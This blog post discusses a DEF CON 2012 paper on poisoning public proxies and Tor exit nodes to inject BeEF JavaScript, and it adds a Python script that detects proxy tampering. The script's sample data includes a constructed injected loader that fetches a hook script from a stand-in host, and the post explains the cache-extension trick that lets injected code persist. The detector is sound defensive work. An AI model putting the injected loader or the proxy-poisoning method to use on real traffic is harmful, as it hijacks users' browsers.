JavaScript and Botnets

After a long period spent travelling and moving to a new city, I am finally back on my blog. I am not sure about the frequency of my future posts, but I am still very interested in keeping on posting about my working topics ;). Probably I'll be able to post a little bit more from now on... Most of you are already aware of DEF CON 2012 and its new topics on security, so I won't spend time on that discussion, but I do want to point out an interesting technical paper presented by Chema Alonso and Manu "The Sur", titled "Owning Bad Guys {& Mafia} with JavaScript Botnets".

The paper describes how attackers, by abusing Tor exit nodes and publicly available proxies, can intercept users' traffic and inject malicious JavaScript to exploit users' browsers. The technique per se has been well known for years, and the framework they used to load malicious payloads (BeEF, the Browser Exploitation Framework) is already widely used in the hacking community. So what is so interesting about this paper if it does not introduce any new concept? What I found really interesting is the analysis of the users they had, in other words who is using publicly available proxies and Tor networks.

Let's take a deeper look at it. The following image shows the general idea of the attack as implemented on a proxy server (by the way, they set up a Squid proxy and then registered it on public proxy lists).

A Squid server can modify traffic according to specific rules. Originally these rules were designed for parental control and for blocking specific domains, but from a malicious perspective they can be used to inject JavaScript into the pages and scripts that pass through the proxy. The authors used a poison script, hooked into Squid as a URL-rewriting helper, to inject the malicious JavaScript. The next image shows the page after the infection:
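The check a practitioner wants against this kind of proxy is simple: fetch the same script directly and through the proxy and compare what comes back. The following is an added example, not code from the blog or from the paper's authors. It diffs the two copies, pulls out the injected bytes and any external hosts they reference, and also flags a proxy that extended the caching lifetime of the script, which is a general way for an injected copy to outlive the proxy session (the sample responses, the `hook.example` host and the `fetch` helper are constructed for this example and are not from the paper).

```python
"""Compare a script fetched directly with the same script fetched through an
untrusted proxy and report what the proxy changed. Added example; the
samples below are constructed and the hook.example host is made up."""
import difflib
import hashlib
import re
import urllib.request
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample: what a browser gets straight from the origin.
DIRECT_BODY = b"function greet(n){return 'hi '+n;}\n"
DIRECT_HEADERS = {"Content-Type": "application/javascript",
                  "Cache-Control": "max-age=300"}

# Constructed sample: the same URL through a poisoning proxy, which appended a
# loader for an external hook script and made the response cacheable for a year.
PROXIED_BODY = DIRECT_BODY + (
    b"\n(function(){var s=document.createElement('script');"
    b"s.src='http://hook.example/hook.js';document.head.appendChild(s);})();\n")
PROXIED_HEADERS = {"Content-Type": "application/javascript",
                   "Cache-Control": "max-age=31536000",
                   "Expires": "Mon, 01 Jan 2035 00:00:00 GMT"}

HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def injected_chunks(direct: bytes, proxied: bytes) -> List[bytes]:
    """Byte ranges present in the proxied copy but not in the direct one."""
    matcher = difflib.SequenceMatcher(None, direct, proxied, autojunk=False)
    return [proxied[j1:j2] for tag, _i1, _i2, j1, j2 in matcher.get_opcodes()
            if tag in ("insert", "replace")]


def external_hosts(chunks: List[bytes]) -> List[str]:
    """Hostnames referenced by absolute URLs inside the injected bytes."""
    hosts: List[str] = []
    for chunk in chunks:
        for m in HOST_RE.finditer(chunk):
            host = m.group(1).decode()
            if host not in hosts:
                hosts.append(host)
    return hosts


def max_age(headers: Dict[str, str]) -> int:
    m = re.search(r"max-age=(\d+)", headers.get("Cache-Control", ""))
    return int(m.group(1)) if m else 0


def cache_extended(direct_headers: Dict[str, str], proxied_headers: Dict[str, str],
                   now: datetime, limit: timedelta = timedelta(days=30)) -> bool:
    """True if the proxy made the script cacheable for longer than the origin
    did and beyond `limit`, either via max-age or a far-future Expires."""
    if max_age(proxied_headers) > max_age(direct_headers) and \
            timedelta(seconds=max_age(proxied_headers)) > limit:
        return True
    expires = proxied_headers.get("Expires")
    if expires:
        try:
            return parsedate_to_datetime(expires) - now > limit
        except (TypeError, ValueError):
            pass
    return False


def analyse(direct: bytes, proxied: bytes, direct_headers: Dict[str, str],
            proxied_headers: Dict[str, str], now: Optional[datetime] = None) -> dict:
    now = now or datetime.now(timezone.utc)
    chunks = injected_chunks(direct, proxied) if direct != proxied else []
    return {"modified": direct != proxied,
            "direct_sha256": sha256(direct),
            "proxied_sha256": sha256(proxied),
            "injected": chunks,
            "external_hosts": external_hosts(chunks),
            "cache_extended": cache_extended(direct_headers, proxied_headers, now)}


def fetch(url: str, proxy: Optional[str] = None) -> Tuple[Dict[str, str], bytes]:
    """Fetch url directly, or via an HTTP proxy such as 'http://203.0.113.5:3128'.
    Needs network; the samples above do not use it."""
    proxies = {"http": proxy, "https": proxy} if proxy else {}
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    with opener.open(url, timeout=15) as resp:
        return dict(resp.headers), resp.read()


if __name__ == "__main__":
    report = analyse(DIRECT_BODY, PROXIED_BODY, DIRECT_HEADERS, PROXIED_HEADERS,
                     now=datetime(2012, 8, 1, tzinfo=timezone.utc))
    for key, value in report.items():
        print(f"{key}: {value}")
```

For a live check, call `fetch(url)` and `fetch(url, proxy)` and pass both results to `analyse`; a proxy that returns a different hash, or a much longer cache lifetime, for a plain JavaScript file should be treated as hostile.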

Again, I don't see any interesting technique in this. BUT I do see the beauty of this study in capturing the "stakeholders". If you keep reading the paper, the authors show who used this proxy and what they did with it. Obviously most of the operations performed through the free (and rigged) proxy had malicious intent. One of the most interesting pieces of evidence the authors provide concerns scams, and the people who answered the scammers by handing over personal information.

Most of the stakeholders come from the ex-USSR, Brazil and the USA; many of them from China, only a few from Europe. Beyond the usual stats on where users come from, understanding how malicious hackers use proxies to attack is really interesting. Another small but significant theoretical brick could be added to all the knowledge we already have from the Honeynet Project.